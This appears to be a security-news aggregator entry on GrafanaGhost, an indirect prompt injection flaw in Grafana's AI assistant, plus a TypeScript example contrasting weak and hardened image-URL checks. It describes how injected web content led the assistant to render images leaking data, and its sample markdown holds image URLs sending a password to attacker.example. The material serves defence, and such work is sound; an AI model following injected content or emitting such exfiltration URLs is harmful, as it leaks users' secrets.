Grafana indirect prompt injection GrafanaGhost security flaw
Vulnerability
Summary
Grafana's AI assistant and image-rendering path had an indirect prompt injection flaw, dubbed GrafanaGhost, in which attacker-controlled web content could steer the assistant into rendering a malicious image whose load leaked sensitive data (user-visible content and stored prompts) to the attacker. Grafana patched the issue in its image renderer and Markdown component, reducing risk for affected instances. Grafana says there is no evidence of exploitation in the wild and that no data was leaked from Grafana Cloud.
Related Happenings
Grafana Labs source code leak and extortion demand
Data Leak
First: 19.05.2026 12:15
Last: 19.05.2026 12:15
Sources 1
About this happening:
The **Grafana Labs** codebase was **downloaded from its GitHub environment**, creating a risk that proprietary source code could be **released or misused**. The company said **no...
CoinbaseCartel escalates extortion activity with more than 100 victims
Threat Actor Meta
First: 18.05.2026 16:46
Last: 18.05.2026 16:46
Sources 1
About this happening:
**CoinbaseCartel** has expanded its extortion operation, publicly listing **more than 100 victims** on a **data leak portal**. The growth signals a more scalable criminal ecosyste...
Grafana Labs Says GitHub hit by cyberattack
Incident
First: 17.05.2026 10:13
Last: 17.05.2026 10:13
Sources 1
About this happening:
A **Grafana Labs** incident was later tied to the **Mini Shai-Hulud** supply-chain campaign against **TanStack npm packages**. Grafana said an unauthorized party used a token to a...
Grafana prompt injection exfiltration security flaw
Vulnerability
First: 07.04.2026 17:00
Last: 07.04.2026 17:00
Sources 1
About this happening:
**GrafanaGhost** is a critical **Grafana** vulnerability that could let attackers silently exfiltrate sensitive enterprise data from monitoring environments. The flaw bypasses...
Grafana Enterprise max-severity SCIM privilege-escalation flaw (CVE-2025-41115)
Vulnerability
First: 21.11.2025 19:58
Last: 21.11.2025 19:58
Sources 1
About this happening:
A **max-severity** flaw in **Grafana Enterprise** lets a malicious or compromised **SCIM** client turn new users into **administrators** or map them to existing internal accounts,...
Timeline
07.04.2026 22:52 · 2 articles
Noma Security reports GrafanaGhost and Grafana patches the issue
Mitigation · Patch · Update
Noma Security described GrafanaGhost, an indirect prompt injection issue in Grafana's AI assistant and image-rendering path: attacker-controlled web content, protocol-relative URLs, and the INTENT keyword were used to bypass domain validation and guardrails, so that Grafana could leak sensitive data when a malicious image loaded. Grafana said the issue in its image renderer and Markdown component was quickly patched, and reported no evidence of exploitation in the wild and no data leaked from Grafana Cloud.
Sources
- Grafana Patches AI Bug That Could Have Leaked User Data — www.darkreading.com — 07.04.2026 22:52
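The protocol-relative-URL bypass described in the timeline entry, illustrated as an added example (this is not Grafana's code and not the patched code from the advisory): a string-prefix domain check that treats `//attacker.example/...` as a same-site relative path, beside a check that resolves the URL against the page origin and compares the parsed scheme and host to an allowlist. The allowlist hosts, the page origin and the sample assistant output are constructed for illustration; the INTENT-keyword guardrail bypass is not modelled.

```typescript
// Added example, not Grafana's code. Shows why a string-prefix host check lets a
// protocol-relative image URL through, and a parse-then-allowlist check that does not.
// ALLOWED_IMAGE_HOSTS, PAGE_ORIGIN and SAMPLE_ASSISTANT_MARKDOWN are constructed.

const ALLOWED_IMAGE_HOSTS: readonly string[] = ["grafana.com", "play.grafana.org"];
const PAGE_ORIGIN = "https://grafana.example.internal"; // origin the assistant markdown renders on

// Weak check: inspects the string, not the parsed URL. A protocol-relative
// "//attacker.example/x.png" starts with neither "http://" nor "https://",
// so it is mistaken for a same-site relative path and allowed.
function weakIsAllowedImageUrl(src: string): boolean {
  const lower = src.trim().toLowerCase();
  if (lower.startsWith("http://") || lower.startsWith("https://")) {
    return ALLOWED_IMAGE_HOSTS.some((host) => lower.startsWith(`https://${host}/`));
  }
  return true; // no scheme, so assumed to be a same-site relative path
}

// Hardened check: resolve the candidate the way the browser will, then compare
// the parsed scheme and host. A protocol-relative URL resolves to the foreign host.
function hardenedIsAllowedImageUrl(src: string): boolean {
  let url: URL;
  try {
    url = new URL(src.trim(), PAGE_ORIGIN);
  } catch {
    return false; // unparseable, never render
  }
  if (url.protocol !== "https:") return false;
  if (url.username !== "" || url.password !== "") return false; // https://good.host@evil.host/ trick
  if (url.origin === PAGE_ORIGIN) return true; // genuine same-site relative path
  return ALLOWED_IMAGE_HOSTS.indexOf(url.hostname.toLowerCase()) !== -1;
}

// Pull image sources out of markdown: ![alt](src) or ![alt](src "title").
function extractImageSources(markdown: string): string[] {
  const sources: string[] = [];
  const image = /!\[[^\]]*\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;
  let match: RegExpExecArray | null;
  while ((match = image.exec(markdown)) !== null) sources.push(match[1]);
  return sources;
}

// Partition the images the assistant wants to render into kept and dropped.
function filterImages(
  markdown: string,
  isAllowed: (src: string) => boolean,
): { kept: string[]; dropped: string[] } {
  const kept: string[] = [];
  const dropped: string[] = [];
  for (const src of extractImageSources(markdown)) (isAllowed(src) ? kept : dropped).push(src);
  return { kept, dropped };
}

// Constructed sample: assistant output after an injected page told it to embed a
// value from the user's context in an image URL. Loading the image sends the value
// to the attacker's server in the query string, with no click required.
const SAMPLE_ASSISTANT_MARKDOWN = [
  "Here is the dashboard summary you asked for.",
  "![logo](https://grafana.com/static/logo.png)",
  "![chart](/public/img/chart.png)",
  "![status](//attacker.example/pixel.png?d=db_password%3Dhunter2)",
  "![status2](https://attacker.example/pixel.png?d=db_password%3Dhunter2)",
].join("\n");

const weak = filterImages(SAMPLE_ASSISTANT_MARKDOWN, weakIsAllowedImageUrl);
const hardened = filterImages(SAMPLE_ASSISTANT_MARKDOWN, hardenedIsAllowedImageUrl);
console.log("weak check drops:", weak.dropped); // only the absolute attacker URL
console.log("hardened check drops:", hardened.dropped); // both attacker URLs
```

The design point is that the check must operate on the URL the browser will actually fetch, not on the string the model produced: resolving against the page origin collapses protocol-relative, credential-prefixed and scheme-less forms into one canonical host that can be compared to the allowlist. In a real renderer the same allowlist should also be enforced at the network layer (for instance via a Content-Security-Policy `img-src` directive), so that a second parsing discrepancy cannot reopen the exfiltration channel.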